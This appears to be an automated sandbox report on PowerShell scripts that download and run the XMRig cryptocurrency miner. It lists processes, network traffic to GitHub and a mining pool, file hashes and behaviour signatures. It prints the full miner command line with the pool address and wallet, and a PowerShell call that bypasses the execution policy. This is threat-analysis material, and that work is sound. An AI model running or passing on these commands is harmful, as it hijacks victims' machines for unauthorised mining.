"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1008-0-0x00007FFA858C3000-0x00007FFA858C5000-memory.dmp

memory/1008-1-0x000001E179F40000-0x000001E179F62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfdz53cd.1yy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1008-10-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp

memory/1008-11-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp

memory/1008-12-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp

memory/1008-14-0x000001E17A070000-0x000001E17A082000-memory.dmp

memory/1008-15-0x000001E179F30000-0x000001E179F3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1472-46-0x0000027E915B0000-0x0000027E915D0000-memory.dmp

memory/1472-47-0x0000027E91910000-0x0000027E91930000-memory.dmp

memory/1472-48-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1008-49-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp

memory/1472-51-0x0000027E91930000-0x0000027E91950000-memory.dmp

memory/1472-50-0x0000027E93100000-0x0000027E93120000-memory.dmp

memory/1008-54-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp

memory/1008-53-0x00007FFA858C3000-0x00007FFA858C5000-memory.dmp

memory/1472-52-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-55-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-56-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-58-0x0000027E91930000-0x0000027E91950000-memory.dmp

memory/1472-57-0x0000027E93100000-0x0000027E93120000-memory.dmp

memory/1472-59-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-60-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-61-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-62-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-63-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-64-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-65-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-66-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-67-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-68-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-69-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-70-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-71-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-72-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-73-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-74-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-75-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-76-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-77-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-78-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-79-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-80-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-81-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-82-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-83-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-84-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-85-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-86-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-87-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-88-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-89-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-90-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-91-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-92-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-93-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-94-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-95-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-96-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-97-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-98-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-99-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-100-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-101-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-102-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-103-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-104-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-105-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-106-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-107-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-108-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-109-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-110-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-111-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-112-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-113-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-114-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-115-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-116-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

memory/1472-117-0x00007FF63D8B0000-0x00007FF63E4E3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:24

Platform

win10v2004-20240226-en

Max time kernel

1805s

Max time network

1804s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4292 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3648 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 172.217.20.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 202.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 24.125.209.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

memory/3484-0-0x00007FFCA3103000-0x00007FFCA3105000-memory.dmp

memory/3484-1-0x000001DF363C0000-0x000001DF363E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwqsztt4.2kd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3484-11-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

memory/3484-12-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

memory/3484-13-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

memory/3484-15-0x00007FFCA3103000-0x00007FFCA3105000-memory.dmp

memory/3484-16-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

memory/3484-17-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

memory/3484-18-0x000001DF36570000-0x000001DF36582000-memory.dmp

memory/3484-19-0x000001DF36560000-0x000001DF3656A000-memory.dmp

memory/3484-20-0x00007FFCA3100000-0x00007FFCA3BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3380-51-0x00000232B5390000-0x00000232B53B0000-memory.dmp

memory/3380-52-0x00000232B55E0000-0x00000232B5600000-memory.dmp

memory/3380-53-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-54-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-55-0x00000232B5600000-0x00000232B5620000-memory.dmp

memory/3380-56-0x00000232B6DD0000-0x00000232B6DF0000-memory.dmp

memory/3380-57-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-58-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-59-0x00000232B5600000-0x00000232B5620000-memory.dmp

memory/3380-61-0x00000232B6DD0000-0x00000232B6DF0000-memory.dmp

memory/3380-60-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-62-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-63-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-64-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-65-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-66-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-67-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-68-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-69-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-70-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-71-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-72-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-73-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-74-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-75-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-76-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-77-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-78-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-79-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-80-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-81-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-82-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-83-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-84-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-85-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-86-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-87-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-88-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-89-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-90-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-91-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-92-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-93-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-94-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-95-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-96-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-97-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-98-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-99-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-100-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-101-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-102-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-103-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-104-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-105-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-106-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-107-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-108-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-109-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-110-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-111-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-112-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-113-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-114-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-115-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-116-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-117-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-118-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

memory/3380-119-0x00007FF72BE40000-0x00007FF72CA73000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

memory/4832-0-0x00007FFFD5833000-0x00007FFFD5835000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmndrb24.elr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4832-10-0x00000216DC580000-0x00000216DC5A2000-memory.dmp

memory/4832-11-0x00007FFFD5830000-0x00007FFFD62F1000-memory.dmp

memory/4832-12-0x00007FFFD5830000-0x00007FFFD62F1000-memory.dmp

memory/4832-14-0x00007FFFD5830000-0x00007FFFD62F1000-memory.dmp

memory/4832-15-0x00000216DC960000-0x00000216DC972000-memory.dmp

memory/4832-16-0x00000216DC6F0000-0x00000216DC6FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4920-47-0x000001D4C5840000-0x000001D4C5860000-memory.dmp

memory/4920-48-0x000001D4C5890000-0x000001D4C58B0000-memory.dmp

memory/4920-49-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-51-0x000001D4C7090000-0x000001D4C70B0000-memory.dmp

memory/4920-50-0x000001D4C7070000-0x000001D4C7090000-memory.dmp

memory/4920-52-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4832-53-0x00007FFFD5833000-0x00007FFFD5835000-memory.dmp

memory/4832-54-0x00007FFFD5830000-0x00007FFFD62F1000-memory.dmp

memory/4920-55-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4832-56-0x00007FFFD5830000-0x00007FFFD62F1000-memory.dmp

memory/4920-57-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-58-0x000001D4C7070000-0x000001D4C7090000-memory.dmp

memory/4920-59-0x000001D4C7090000-0x000001D4C70B0000-memory.dmp

memory/4920-60-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-61-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-62-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-63-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-64-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-65-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

memory/4920-66-0x00007FF6CE480000-0x00007FF6CF0B3000-memory.dmp

